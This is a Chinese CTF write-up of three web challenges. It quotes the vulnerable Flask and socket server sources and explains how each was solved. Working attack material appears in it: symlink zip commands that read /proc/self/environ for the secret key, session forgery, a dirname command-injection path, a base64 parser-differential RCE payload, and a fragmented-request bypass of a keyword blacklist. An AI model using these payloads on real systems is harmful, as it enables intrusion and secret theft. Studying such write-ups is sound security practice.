# online_unzipper
# Challenge source as quoted in the write-up: a small Flask app that lets a
# logged-in user upload a zip archive, extracts it with the system `unzip`
# binary into a per-upload directory and serves the extracted files back.
import os
import uuid
from flask import Flask, request, redirect, url_for, send_file, render_template, session, send_from_directory, abort, Response

app = Flask(__name__)
# Session signing key: taken from FLASK_SECRET_KEY, with the literal
# "test_key" as the fallback when the variable is not set.
app.secret_key = os.environ.get("FLASK_SECRET_KEY", "test_key")

# All uploads live under ./uploads relative to the working directory.
UPLOAD_FOLDER = os.path.join(os.getcwd(), "uploads")
os.makedirs(UPLOAD_FOLDER, exist_ok=True)

# In-memory account store: username -> {"password": ..., "role": ...}.
users = {}


@app.route("/")
def index():
    """Send anonymous visitors to the login page, everyone else to /upload."""
    if "username" not in session:
        return redirect(url_for("login"))
    return redirect(url_for("upload"))


@app.route("/register", methods=["GET", "POST"])
def register():
    """Render the registration form (GET) or create a new account (POST)."""
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if username in users:
            return "用户名已存在"
        # Every account created here gets the "user" role; nothing in this
        # listing ever assigns "admin".
        users[username] = {"password": password, "role": "user"}
        return redirect(url_for("login"))
    return render_template("register.html")


@app.route("/login", methods=["GET", "POST"])
def login():
    """Render the login form (GET) or check credentials and fill the session (POST)."""
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if username in users and users[username]["password"] == password:
            # Both the username and the role are stored in the session;
            # upload() later reads the role from the session, not from `users`.
            session["username"] = username
            session["role"] = users[username]["role"]
            return redirect(url_for("upload"))
        else:
            return "用户名或密码错误"
    return render_template("login.html")


@app.route("/logout")
def logout():
    """Drop the whole session and go back to the login page."""
    session.clear()
    return redirect(url_for("login"))


@app.route("/upload", methods=["GET", "POST"])
def upload():
    """Render the upload form (GET) or store and extract an uploaded zip (POST).

    Requires a logged-in session. On POST the archive is saved as
    ``upload.zip`` inside a fresh directory, extracted in place with
    ``unzip``, and an HTML snippet linking to the download page is returned.
    """
    if "username" not in session:
        return redirect(url_for("login"))
    if request.method == "POST":
        file = request.files["file"]
        if not file:
            return "未选择文件"
        role = session["role"]
        if role == "admin":
            # Admin sessions may choose the directory name via the form.
            dirname = request.form.get("dirname") or str(uuid.uuid4())
        else:
            dirname = str(uuid.uuid4())
        target_dir = os.path.join(UPLOAD_FOLDER, dirname)
        os.makedirs(target_dir, exist_ok=True)
        zip_path = os.path.join(target_dir, "upload.zip")
        file.save(zip_path)
        try:
            # NOTE(review): both paths are interpolated unquoted into a shell
            # command line, and for admin sessions `dirname` comes straight
            # from the request form.
            # NOTE(review): os.system reports a failing command through its
            # return value, so this `except` presumably never fires for a bad
            # archive - confirm.
            os.system(f"unzip -o {zip_path} -d {target_dir} ")
        except:
            return "解压失败,请检查文件格式"
        os.remove(zip_path)
        return f"解压完成!<br>下载地址: <a href='{url_for('download' , folder=dirname)} '>{request.host_url} download/{dirname} </a>"
    return render_template("upload.html")


@app.route("/download/<folder>")
def download(folder):
    """List the files inside one extraction directory, or 404 if it is missing."""
    target_dir = os.path.join(UPLOAD_FOLDER, folder)
    if not os.path.exists(target_dir):
        abort(404)
    files = os.listdir(target_dir)
    return render_template("download.html", folder=folder, files=files)


@app.route("/download/<folder>/<filename>")
def download_file(folder, filename):
    """Return the content of one extracted file as an attachment.

    Responds with 404 when the file does not exist and with 500 (including
    the exception text) for any other error.
    """
    file_path = os.path.join(UPLOAD_FOLDER, folder, filename)
    try:
        # The file is opened in text mode, and open() follows whatever the
        # path resolves to.
        with open(file_path, 'r') as file:
            content = file.read()
        return Response(
            content,
            mimetype="application/octet-stream",
            headers={
                "Content-Disposition": f"attachment; filename={filename} "
            }
        )
    except FileNotFoundError:
        return "File not found", 404
    except Exception as e:
        return f"Error: {str (e)} ", 500


if __name__ == "__main__":
    app.run(host="0.0.0.0")
抓包解cookie,发现需要伪造session,需要secretkey(笑死我了lmtx) 注意到upload路由
1 2 3 4 try : os.system(f"unzip -o {zip_path} -d {target_dir} " ) except : return "解压失败,请检查文件格式"
这不就是经典软链接吗
我直接读flag(屮,读不到),估计不叫flag
那先伪造admin吧
需要secretkey,直接读环境变量
1 2 ln -s /proc/self/environ env zip --symlinks a.zip env
我复现的时候的secretkey就是test
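所以直接用 flask-unsign 就可以伪造出 admin 的 session。admin 可以通过表单自定义 dirname,而 dirname 会被直接拼接进 os.system 的 unzip 命令里,因此可以命令注入:把命令输出重定向写入解压目录,再通过下载接口读出来即可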
这题比较简单
# ping
# Challenge source as quoted in the write-up: a Flask endpoint that receives a
# Base64-encoded IPv4 address, validates the decoded value in Python and then
# lets the shell decode the same Base64 text again to build the ping command.
import base64
import subprocess
import re
import ipaddress
import flask


def run_ping(ip_base64):
    """Validate a Base64-encoded IPv4 address and ping it once.

    Returns the captured stdout of the command on success and ``False`` when
    validation fails or the command raises (non-zero exit included, because
    of ``check=True``).
    """
    try:
        # Every check below is made on the value *Python* decodes.
        decoded_ip = base64.b64decode(ip_base64).decode('utf-8')
        if not re.match(r'^\d+\.\d+\.\d+\.\d+$', decoded_ip):
            return False
        if decoded_ip.count('.') != 3:
            return False
        if not all(0 <= int(part) < 256 for part in decoded_ip.split('.')):
            return False
        if not ipaddress.ip_address(decoded_ip):
            return False
        if len(decoded_ip) > 15:
            return False
        # The raw input is only restricted to the Base64 alphabet plus '='.
        if not re.match(r'^[A-Za-z0-9+/=]+$', ip_base64):
            return False
    except Exception as e:
        return False
    # The command embeds the raw Base64 text, not `decoded_ip`: the shell's
    # `base64 -d` decodes it a second time and the result is piped to `sh`.
    command = f"""echo "ping -c 1 $(echo '{ip_base64} ' | base64 -d)" | sh"""
    try:
        process = subprocess.run(
            command,
            shell=True,
            check=True,
            capture_output=True,
            text=True
        )
        return process.stdout
    except Exception as e:
        return False


app = flask.Flask(__name__)


@app.route('/ping', methods=['POST'])
def ping():
    """Handle POST /ping: read ``ip_base64`` from the JSON body and run the ping."""
    data = flask.request.json
    ip_base64 = data.get('ip_base64')
    if not ip_base64:
        return flask.jsonify({'error': 'no ip'}), 400
    result = run_ping(ip_base64)
    if result:
        return flask.jsonify({'success': True, 'output': result}), 200
    else:
        return flask.jsonify({'success': False}), 400


@app.route('/')
def index():
    """Serve the frontend page."""
    return flask.render_template('index.html')


app.run(host='0.0.0.0', port=5000)
当时想着再蒸蒸就能出,但是还是去做志愿活动了(哈哈哈,也没办法)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 try : decoded_ip = base64.b64decode(ip_base64).decode('utf-8' ) if not re.match (r'^\d+\.\d+\.\d+\.\d+$' , decoded_ip): return False if decoded_ip.count('.' ) != 3 : return False if not all (0 <= int (part) < 256 for part in decoded_ip.split('.' )): return False if not ipaddress.ip_address(decoded_ip): return False if len (decoded_ip) > 15 : return False if not re.match (r'^[A-Za-z0-9+/=]+$' , ip_base64): return False except Exception as e: return False
这里正则写的很死,想绕过基本上是不可能的
注意到前端
<script>
  // Submit handler of the ping form: Base64-encodes whatever was typed into
  // the "ip" field and POSTs it to /ping as JSON, then renders the result.
  document
    .getElementById("pingForm")
    .addEventListener("submit", function (event) {
      event.preventDefault();
      const ip = document.getElementById("ip").value;
      // Encoding happens in the browser only; a client that talks to /ping
      // directly can send any Base64 text it likes.
      const ip_base64 = btoa(ip);
      const resultElement = document.getElementById("result");
      const submitButton = document.getElementById("submitBtn");
      // Show a pending state and block double submits while the request runs.
      resultElement.textContent = "Pinging...";
      resultElement.style.color = "var(--text-secondary-color)";
      submitButton.disabled = true;
      submitButton.textContent = "Pinging...";
      fetch("/ping", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({ ip_base64: ip_base64 }),
      })
        // Keep the HTTP status next to the parsed JSON body.
        .then((response) =>
          response
            .json()
            .then((data) => ({ status: response.status, body: data }))
        )
        .then(({ status, body }) => {
          if (status === 200 && body.success) {
            resultElement.style.color = "var(--success-color)";
            resultElement.textContent = body.output;
          } else {
            resultElement.style.color = "var(--error-color)";
            resultElement.textContent =
              "Ping failed: " + (body.error || "Invalid IP");
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          resultElement.style.color = "var(--error-color)";
          resultElement.textContent = "An error occurred";
        })
        // Re-enable the button whatever the outcome was.
        .finally(() => {
          submitButton.disabled = false;
          submitButton.textContent = "Ping";
        });
    });
</script>
这里是直接把我们输入的ip编码为base64然后发送过去
那就很可疑了,好端端的,偏偏要前端编码一次,后端解码一次,这就是猫腻所在,而且也因为前端的编码,把我们对后端的输入内容限制死了,只限制在点分十进制的ipv4地址上
所以这里用hackbar绕过前端 这样子我就可以直接输入base64编码的内容,来进行操作
接下来就是去查查会存在什么问题了
1 2 3 4 5 import base64import subprocessimport reimport ipaddressimport flask
导入base64库,这一整个题都在围绕base64展开,估计是有什么不为人知的小trick
跟进去看源码 这里用的是base64.b64decode
def b64decode(s, altchars=None, validate=False):
    """Decode the Base64 encoded bytes-like object or ASCII string s.

    Optional altchars must be a bytes-like object or ASCII string of length 2
    which specifies the alternative alphabet used instead of the '+' and '/'
    characters.

    The result is returned as a bytes object.  A binascii.Error is raised if
    s is incorrectly padded.

    If validate is False (the default), characters that are neither in the
    normal base-64 alphabet nor the alternative alphabet are discarded prior
    to the padding check.  If validate is True, these non-alphabet characters
    in the input result in a binascii.Error.
    For more information about the strict base64 check, see:

    https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
    """
    s = _bytes_from_decode_data(s)
    if altchars is not None:
        altchars = _bytes_from_decode_data(altchars)
        assert len(altchars) == 2, repr(altchars)
        # Map the alternative alphabet back onto the standard '+' and '/'.
        s = s.translate(bytes.maketrans(altchars, b'+/'))
    # `validate` is forwarded unchanged as strict_mode, so the default call
    # b64decode(s) decodes with strict_mode=False.
    return binascii.a2b_base64(s, strict_mode=validate)
哈哈哈,还给了文档,去看看 没什么头绪
回过来重新阅读源码,发现猫腻
做格式校验的时候,用的是 Python 的 base64.b64decode 来解码;而真正执行 ping 的时候,是用 shell 的 base64 -d 来解码。两个解码器对同一段输入的处理结果可能不一致,问题肯定出在这里
1 command = f"""echo "ping -c 1 $(echo '{ip_base64} ' | base64 -d)" | sh"""
说明有某种方法可以绕过python的base64解码后的检查,同时也可以被shell正确解码,实现rce
重新读一下源码的注释
1 2 The result is returned as a bytes object. A binascii.Error is raised if s is incorrectly padded.
这里说s要是被错误填充的话,就会抛出一个binascii错误,去看看错误
挖草,一下子全部都清晰起来了 这里说的,如果 strict_mode 为真,则仅转换有效的 base64 数据。无效的 base64 数据将引发 binascii.Error
而我们看b64decode的源码
1 return binascii.a2b_base64(s, strict_mode=validate)
密码的 尴尬了兄弟,这里strict_mode一直都是false
看wp
这里有一个小trick(目前还不知道该如何去解释)
Python 的 base64.b64decode(默认非严格模式)在遇到第一段完整的 = 填充之后就不再继续解码,后面的内容会被忽略,因此解码结果只有前半段,可以通过"只能是 IP 格式"的校验;而 shell 的 base64 -d 会把拼接在一起的多段编码分别解码后再拼接,从而可以拼接命令执行。因此我们把 payload 拆成两部分分别编码、再拼接即可:
明文:0.0.0.0;cat /flag
payload:MC4wLjAuMA==O2NhdCAvZmxhZw==
成功拿到flag
关于我发现的那些东西,文档里讲的不太清楚,也有可能扯到new trick,我和拉蒙特徐讨论了之后,给python发了issue
最后issue被接受了,他们更改了那段模糊不清的解释
Peek a Fork 套接字吗,有点东西啊
# Challenge source as quoted in the write-up: a forking raw-socket HTTP server
# with a keyword blacklist in the parent process and a file reader in the
# child process.
import socket
import os
import hashlib
import fcntl
import re
import mmap

# Read the flag, copy it into an mmap created with fileno -1 (no backing
# file), then delete flag.txt from disk.
with open('flag.txt', 'rb') as f:
    flag = f.read()
mm = mmap.mmap(-1, len(flag))
mm.write(flag)
os.remove('flag.txt')

# Byte sequences that make the parent reject a connection.
FORBIDDEN = [b'flag', b'proc', b'<', b'>', b'^', b"'", b'"', b'..', b'./']

# Static page returned when no file name is requested.
PAGE = """<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Secure Gateway</title> <style> body { font-family: 'Courier New', monospace; background-color: #0c0c0c; color: #00ff00; text-align: center; margin-top: 10%; } .container { border: 1px solid #00ff00; padding: 2rem; display: inline-block; } h1 { font-size: 2.5rem; text-shadow: 0 0 5px #00ff00; } p { font-size: 1.2rem; } .status { color: #ffff00; } </style> </head> <body> <div class="container"> <h1>Firewall</h1> <p class="status">STATUS: All systems operational.</p> <p>Your connection has been inspected.</p> </div> </body> </html>"""


def handle_connection(conn, addr, log, factor=1):
    """Serve one accepted connection, then terminate the current process.

    Args:
        conn: The accepted client socket.
        addr: The peer address returned by ``accept()``; ``addr[0]`` and
            ``addr[1]`` are used for the log entry.
        log: When truthy, append a hashed log entry to ``log.txt`` before
            reading the request.
        factor: Number of SHA3-256 rounds applied to the log entry.

    The function never returns to its caller: the ``finally`` clause closes
    the socket and calls ``os._exit(0)``.
    """
    try:
        conn.settimeout(10.0)
        if log:
            with open('log.txt', 'a') as f:
                # Exclusive lock on log.txt while the entry is computed and
                # written.
                fcntl.flock(f, fcntl.LOCK_EX)
                log_bytes = f"{addr[0 ]} :{str (addr[1 ])} :{str (conn)} ".encode()
                # `factor` comes from the request (see main), so the number
                # of hash rounds run before the request is read is chosen by
                # the client.
                for _ in range(factor):
                    log_bytes = hashlib.sha3_256(log_bytes).digest()
                log_entry = log_bytes.hex() + "\n"
                f.write(log_entry)
        # This is the real read of the request; main() only peeked at it.
        request_data = conn.recv(256)
        if not request_data.startswith(b"GET /"):
            response = b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"
            conn.sendall(response)
            return
        try:
            # Second space-separated token of the request line.
            path = request_data.split(b' ')[1]
            pattern = rb'\?offset=(\d+)&length=(\d+)'
            offset = 0
            length = -1
            match = re.search(pattern, path)
            if match:
                offset = int(match.group(1).decode())
                length = int(match.group(2).decode())
                clean_path = re.sub(pattern, b'', path)
                filename = clean_path.strip(b'/').decode()
            else:
                filename = path.strip(b'/').decode()
        except Exception:
            response = b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"
            conn.sendall(response)
            return
        if not filename:
            response_body = PAGE
            response_status = "200 OK"
        else:
            try:
                # The surrounding slashes were stripped above, so the name is
                # opened relative to the working directory after normpath().
                with open(os.path.normpath(filename), 'rb') as f:
                    if offset > 0:
                        f.seek(offset)
                    # length == -1 (the default) reads to end of file.
                    data_bytes = f.read(length)
                response_body = data_bytes.decode('utf-8', 'ignore')
                response_status = "200 OK"
            except Exception as e:
                response_body = f"Invalid path"
                response_status = "500 Internal Server Error"
        response = f"HTTP/1.1 {response_status} \r\nContent-Length: {len (response_body)} \r\n\r\n{response_body} "
        conn.sendall(response.encode())
    except Exception:
        pass
    finally:
        conn.close()
        # Hard-exit the current process; main() only calls this function in
        # the forked child (pid == 0).
        os._exit(0)


def main():
    """Accept connections on port 1337, filter them, and fork one child per request."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 1337))
    server.listen(50)
    print(f"Server listening on port 1337...")
    while True:
        # Non-blocking reap of at most one finished child per loop iteration.
        try:
            pid, status = os.waitpid(-1, os.WNOHANG)
        except ChildProcessError:
            pass
        conn, addr = server.accept()
        # MSG_PEEK: look at up to 256 bytes without consuming them. The
        # blacklist sees only what this call returns; the child does its own
        # recv(256) later.
        initial_data = conn.recv(256, socket.MSG_PEEK)
        if any(term in initial_data.lower() for term in FORBIDDEN):
            conn.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected.")
            conn.close()
            continue
        if initial_data.startswith(b'GET /?log=1'):
            try:
                factor = 1
                pattern = rb"&factor=(\d+)"
                match = re.search(pattern, initial_data)
                if match:
                    factor = int(match.group(1).decode())
                pid = os.fork()
                if pid == 0:
                    # Child: drop the listening socket and serve the request
                    # with logging enabled.
                    server.close()
                    handle_connection(conn, addr, True, factor)
            except Exception as e:
                print("[ERROR]: ", e)
            finally:
                # Parent closes its copy of the client socket.
                conn.close()
            continue
        else:
            pid = os.fork()
            if pid == 0:
                # Child: serve the request without logging.
                server.close()
                handle_connection(conn, addr, False)
            conn.close()


if __name__ == '__main__':
    main()
知识盲区了属于是
稍微了解一下mmap文档
从文档中,可以看出来这里直接把flag写入了内存,然后删除了flag.txt AI给出的做法是
1. 用"分片发送"的 trick 请求 proc/self/maps:父进程的黑名单只检查 MSG_PEEK 那一刻已经到达的数据(最多 256 字节),把敏感关键字放到后面的分片里发送,就可以绕过黑名单,拿到 maps;
2. 解析 maps,找候选的可读 rw 区间,然后分别请求读取这些地址对应的 /proc/self/mem
这题要补充的知识稍微有点多,明天再看看